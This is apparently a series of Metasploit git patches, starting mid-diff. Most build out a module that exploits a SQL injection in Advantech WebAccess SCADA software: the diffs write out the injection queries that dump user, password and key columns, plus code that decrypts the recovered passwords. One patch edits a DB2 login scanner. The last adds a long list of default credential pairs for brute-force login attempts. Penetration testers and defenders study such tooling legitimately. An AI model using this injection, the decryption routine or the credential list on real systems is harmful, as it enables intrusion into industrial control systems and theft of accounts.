1 + end + + result + end end From 7ec85c9d3a4de5f47628ee4fa154caa1f0ced465 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 01:03:04 -0500 Subject: [PATCH 09/33] Delete blank lines --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 8985ee25e3..88bb7830ba 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -207,13 +207,11 @@ class Metasploit3 < Msf::Auxiliary j = 0 while i < 16 low = bytes[i] - if low < 0x41 low = low - 0x30 else low = low - 0x37 end - low = low * 16 high = bytes[i+1] @@ -224,9 +222,7 @@ class Metasploit3 < Msf::Auxiliary end recovered_byte = low + high - recovered[j] = recovered_byte - i = i + 2 j = j + 1 end @@ -245,7 +241,6 @@ class Metasploit3 < Msf::Auxiliary else byte_weight = b - 0x37 end - recovered = recovered + byte_weight } From c9465a892282e049943c71dae4f5e3ef1fe36421 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 08:57:59 -0500 Subject: [PATCH 10/33] Rescue when the recovered info is in a format we can't understand --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 88bb7830ba..e5475ed0a7 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -164,7 +164,13 @@ class Metasploit3 < Msf::Auxiliary ) for i in 0..@users.length - 1 - @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = + begin + decrypt_password(@enc_passwords[i], @keys[i]) + rescue + "(format not recognized)" + end + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, From ea38a2c6e5685e6733fa4a29020b6133b5963629 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 11:11:58 -0500 Subject: [PATCH 11/33] Handle ISO-8859-1 special chars --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index e5475ed0a7..69c8d661fe 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -172,6 +172,15 @@ class Metasploit3 < Msf::Auxiliary end @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? + + begin + @plain_passwords[i].encode("ISO-8859-1").to_s + rescue Encoding::UndefinedConversionError + chars = @plain_passwords[i].unpack("C*") + @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}" + @plain_passwords[i] << " (ISO-8859-1 hex chars)" + end + report_auth_info({ :host => rhost, :port => rport, @@ -184,6 +193,7 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end + print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 883d2f14b51c9e29f769c0df7660d314bfb41f87 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 11:13:03 -0500 Subject: [PATCH 12/33] delete debug print_status --- .../auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 69c8d661fe..1b8b6b7e53 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -193,7 +193,6 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end - print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 02a9d7f15df61c208c62b9195744ede353e3d32f Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 16 May 2014 11:20:04 -0500 Subject: [PATCH 13/33] minor cleanup minor style changes found in code review --- lib/metasploit/framework/login_scanner/db2.rb | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb index 8c4e6bfbbb..cfc17c4652 100644 --- a/lib/metasploit/framework/login_scanner/db2.rb +++ b/lib/metasploit/framework/login_scanner/db2.rb @@ -13,7 +13,7 @@ module Metasploit include Metasploit::Framework::LoginScanner::RexSocket include Metasploit::Framework::Tcp::Client - # (see Base#attempt_login) + # @see Base#attempt_login def attempt_login(credential) result_options = { credential: credential @@ -64,7 +64,7 @@ module Metasploit end end - # This method opens a socket to the target DB2 server.do + # This method opens a socket to the target DB2 server. # It then sends a client probe on that socket to get information # back on the server. # @param database_name [String] The name of the database to probe @@ -77,17 +77,20 @@ module Metasploit sock.put probe_packet response = sock.get_once - return {} unless valid_response?(response) - packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) - Rex::Proto::DRDA::Utils.server_packet_info(packet) + response_data = {} + if valid_response?(response) + packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) + response_data = Rex::Proto::DRDA::Utils.server_packet_info(packet) + end + response_data end # This method sets the sane defaults for things # like timeouts and TCP evasion options def set_sane_defaults - self.max_send_size = 0 if self.max_send_size.nil? - self.send_delay = 0 if self.send_delay.nil? - self.ssl = false if self.ssl.nil? + self.max_send_size ||= 0 + self.send_delay ||= 0 + self.ssl ||= false end # This method takes a response packet and checks to see @@ -111,7 +114,7 @@ module Metasploit # @param response [String] The response to examine from the socket # @return [Boolean] Whether the response is valid def valid_response?(response) - response and response.length > 0 + response && response.length > 0 end end From 4143474da93031b4703d4535ff452e32c85651e5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 11:47:01 -0500 Subject: [PATCH 14/33] Add support for web databases --- .../advantech_webaccess_dbvisitor_sqli.rb | 36 ++++++++----------- 1 file changed, 15 insertions(+), 21 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1b8b6b7e53..5d8d7b7886 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious - requests to the ChartThemeConfig web service. This module can be used to extract the BEMS - site usernames and hashes. + requests to the ChartThemeConfig web service. This module can be used to extract the site + and projects usernames and hashes. }, 'References' => [ @@ -40,7 +40,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']), + OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"]) ], self.class) end @@ -98,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary Msf::Exploit::CheckCode::Vulnerable end - def parse_users(xml, mark) + def parse_users(xml, mark, separator) doc = Document.new(xml) strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) @@ -111,13 +112,7 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| next if result == mark - if i < (strings_length / 3) - @users.push(result) - elsif i < (strings_length / 3) * 2 - @enc_passwords.push(result) - else - @keys.push(result) - end + @users << result.split(separator) i = i + 1 end @@ -127,13 +122,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) + separator = Rex::Text.rand_text_alpha(5 + rand(5)) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where #{rand}=#{rand} " - injection << "union all select Password from BAUser where #{rand}=#{rand} " - injection << "union all select Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -143,12 +139,10 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @enc_passwords = [] - @keys = [] @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") - parse_users(data, mark) + parse_users(data, mark, separator) if @users.empty? print_error("#{peer} - Users not found") @@ -166,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary for i in 0..@users.length - 1 @plain_passwords[i] = begin - decrypt_password(@enc_passwords[i], @keys[i]) + decrypt_password(@users[i][1], @users[i][2]) rescue "(format not recognized)" end @@ -184,13 +178,13 @@ class Metasploit3 < Msf::Auxiliary report_auth_info({ :host => rhost, :port => rport, - :user => @users[i], + :user => @users[i][0], :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" + :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] end print_line(users_table.to_s) From 2012d41b3d21cd524b03651b7e6d954f1f08ba90 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 13:51:42 -0500 Subject: [PATCH 15/33] Add origin of the user, and mark web users --- .../advantech_webaccess_dbvisitor_sqli.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 5d8d7b7886..4812b2a232 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -127,9 +127,9 @@ class Metasploit3 < Msf::Auxiliary # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin'] ) for i in 0..@users.length - 1 @@ -182,14 +182,25 @@ class Metasploit3 < Msf::Auxiliary :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" + :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] + + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])] end print_line(users_table.to_s) end + def user_type(database) + user_type = database + + unless database == "BAUser" + user_type << " (Web Access)" + end + + user_type + end + def decrypt_password(password, key) recovered_password = recover_password(password) recovered_key = recover_key(key) From af82ae262cbe9d49feb679a43a984c6e7cfbdbb3 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Fri, 16 May 2014 23:27:18 +0200 Subject: [PATCH 16/33] Added a large default password list for services. --- .../default_passwords_large_unhash.txt | 1787 +++++++++++++++++ 1 file changed, 1787 insertions(+) create mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt new file mode 100644 index 0000000000..ff0458f94b --- /dev/null +++ b/data/wordlists/default_passwords_large_unhash.txt @@ -0,0 +1,1787 @@ +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 +aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! +install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install +root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init +PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! +admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat +REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya +supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass +PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys +http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys 